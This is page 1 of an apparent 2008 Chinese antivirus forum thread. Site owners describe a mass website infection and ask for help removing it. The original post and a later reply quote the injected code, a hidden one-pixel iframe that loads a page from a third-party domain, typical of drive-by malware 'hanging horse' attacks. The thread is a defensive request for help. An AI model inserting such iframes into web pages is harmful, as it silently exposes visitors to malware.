瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 网站被注入流氓代码,如何修补,谢谢。

12   1  /  2  页   跳转

[求助] 网站被注入流氓代码,如何修补,谢谢。

网站被注入流氓代码,如何修补,谢谢。

被注入流氓代码如下:
<iframe src=http://www.hukau.cn/kuku008.htm width=1 height=1></iframe> 

118jj.com

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
分享到:
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

看来不是我一个。网上这么多人发贴,昨天中着了
最后编辑seemejob 最后编辑于 2008-08-24 04:03:14
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

没人回答啊?
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

昨天好多人中了这个木马。瑞星能解决吗。我搜索了一下网上发贴,都是23号中的。
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

118jj.com
我临时关闭服务器了。
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

elyjob.com也中了
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

远程ie打开,被挂马,服务器本地打开正常。很奇怪。网站文件未被修改过。
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

确实服务器上增加了flash等加载项。补丁都是最新的。应该没问题。服务器上的网站代码没有被修改的文件。realplay没有。可是flash插件删除不掉啊。现在只能选择ie的禁止功能。
gototop
 

回复 10F networkedition 的帖子

服务器是增加了flash加载项。flash插件已经删除不掉。现在只能关闭ie加载项,补丁都是最新的,应该没问题。数据库和网站恢复到n天前正常状态,还是有不能解决。
飘泊而立狮,可否加我qq294955933.我给您远程权限,帮我看看服务器。
gototop
 

回复:网站被注入流氓代码,如何修补,谢谢。

服务器上没有这个代码,可是浏览过这个域名的主机(我自己的电脑)的注册表里发现了。
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

url10:
<iframe src=http://www.hukau.cn/kuku008.htm width=1 height=1></iframe> 
url19
http://www.hukau.cn/kuku008.htm
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT